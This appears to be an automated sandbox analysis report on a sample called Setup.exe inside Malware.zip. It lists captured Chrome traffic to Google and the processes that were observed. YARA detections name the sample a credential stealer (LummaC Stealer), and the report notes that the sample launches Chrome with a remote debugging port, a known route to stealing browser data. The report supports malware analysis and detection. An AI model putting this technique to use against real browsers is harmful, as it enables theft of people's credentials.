                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2025-03-10 23:42:48 UTC1303INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Mon, 10 Mar 2025 23:42:48 GMT
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Expires: -1
                                                                                                                                                                                                                      Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                      Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                      Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-XAFTv64hrkoP_WiLDFZZkQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                      Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                      Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                      Accept-CH: Downlink
                                                                                                                                                                                                                      Accept-CH: RTT
                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Bitness
Accept-CH: Sec-CH-UA-Full-Version-List
Accept-CH: Sec-CH-UA-WoW64
Permissions-Policy: unload=()
Content-Disposition: attachment; filename="f.txt"
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.16  49713        142.250.74.196  443               7160  C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp                Bytes transferred  Direction  Data
2025-03-10 23:42:47 UTC  359                OUT        GET /async/ddljson?async=ntp:2 HTTP/1.1
Host: www.google.com
Connection: keep-alive
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: en-US,en;q=0.9


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
4           192.168.2.16  49715        142.250.74.196  443               7160  C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp                Bytes transferred  Direction  Data
2025-03-10 23:42:47 UTC  404                OUT        GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
Host: www.google.com
Connection: keep-alive
X-Client-Data: CLbgygE=
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: en-US,en;q=0.9
2025-03-10 23:42:48 UTC  1055               IN         HTTP/1.1 200 OK
Version: 734020781
Content-Type: application/json; charset=UTF-8
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
Accept-CH: Sec-CH-Prefers-Color-Scheme
Accept-CH: Downlink
Accept-CH: RTT
Accept-CH: Sec-CH-UA-Form-Factors
Accept-CH: Sec-CH-UA-Platform
Accept-CH: Sec-CH-UA-Platform-Version
Accept-CH: Sec-CH-UA-Full-Version
Accept-CH: Sec-CH-UA-Arch
Accept-CH: Sec-CH-UA-Model
Accept-CH: Sec-CH-UA-Bitness
Accept-CH: Sec-CH-UA-Full-Version-List
Accept-CH: Sec-CH-UA-WoW64
Permissions-Policy: unload=()
Content-Disposition: attachment; filename="f.txt"
Date: Mon, 10 Mar 2025 23:42:48 GMT
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
                                                                                                                                                                                                                      Data Ascii: 8000,a?a\u003d(b||c).querySelector(a?\".\"+a:\"\"):(b\u003db||c,a\u003d(a?b.querySelectorAll(a?\".\"+a:\"\"):b.getElementsByTagName(\"*\"))[0]||null));return a||null};\n_.ge\u003dfunction(a,b){_.zb(b,function(c,d){d\u003d\u003d\"style\"?a.style.cssText\


Session ID: 5
Source IP: 192.168.2.16
Source Port: 49714
Destination IP: 142.250.74.196
Destination Port: 443
PID: 7160
Process: C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp | Bytes transferred | Direction | Data
2025-03-10 23:42:47 UTC | 393 | OUT | GET /async/newtab_promos HTTP/1.1
Host: www.google.com
Connection: keep-alive
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
Sec-Fetch-Storage-Access: active
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: en-US,en;q=0.9
2025-03-10 23:42:48 UTC | 970 | IN | HTTP/1.1 200 OK
Version: 734020781
Content-Type: application/json; charset=UTF-8
X-Content-Type-Options: nosniff
Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
Accept-CH: Downlink
Accept-CH: RTT
Accept-CH: Sec-CH-UA-Form-Factors
Accept-CH: Sec-CH-UA-Platform
Accept-CH: Sec-CH-UA-Platform-Version
Accept-CH: Sec-CH-UA-Full-Version
Accept-CH: Sec-CH-UA-Arch
Accept-CH: Sec-CH-UA-Model
Accept-CH: Sec-CH-UA-Bitness
Accept-CH: Sec-CH-UA-Full-Version-List
Accept-CH: Sec-CH-UA-WoW64
Permissions-Policy: unload=()
Content-Disposition: attachment; filename="f.txt"
Date: Mon, 10 Mar 2025 23:42:48 GMT
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
2025-03-10 23:42:48 UTC | 35 | IN | Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
Data Ascii: 1d)]}'{"update":{"promos":{}}}
2025-03-10 23:42:48 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Target ID: 1
Start time: 19:41:35
Start date: 10/03/2025
Path: C:\Windows\System32\rundll32.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Imagebase: 0x7ff791570000
File size: 71'680 bytes
MD5 hash: EF3179D498793BF4234F708D3BE28633
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 8
Start time: 19:41:46
Start date: 10/03/2025
Path: C:\Windows\System32\OpenWith.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\OpenWith.exe -Embedding
Imagebase: 0x7ff7697c0000
File size: 123'984 bytes
MD5 hash: E4A834784FA08C17D47A1E72429C5109
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 10
Start time: 19:41:53
Start date: 10/03/2025
Path: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe"
Imagebase: 0x7d0000
File size: 6'666'240 bytes
MD5 hash: E1DF45DCA577E2C5941E714A0F9C32EC
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2489986911.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 0000000A.00000002.2480222478.0000000001329000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: false

Target ID: 13
Start time: 19:42:42
Start date: 10/03/2025
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --remote-debugging-port=9223
Imagebase: 0x7ff77eaf0000
File size: 3'388'000 bytes
MD5 hash: E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: false

Target ID: 14
Start time: 19:42:44
Start date: 10/03/2025
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2380,i,11729313136857741515,7979103794442491089,262144 --variations-seed-version --mojo-platform-channel-handle=2548 /prefetch:3
Imagebase: 0x7ff77eaf0000
File size: 3'388'000 bytes
MD5 hash: E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: false

No disassembly
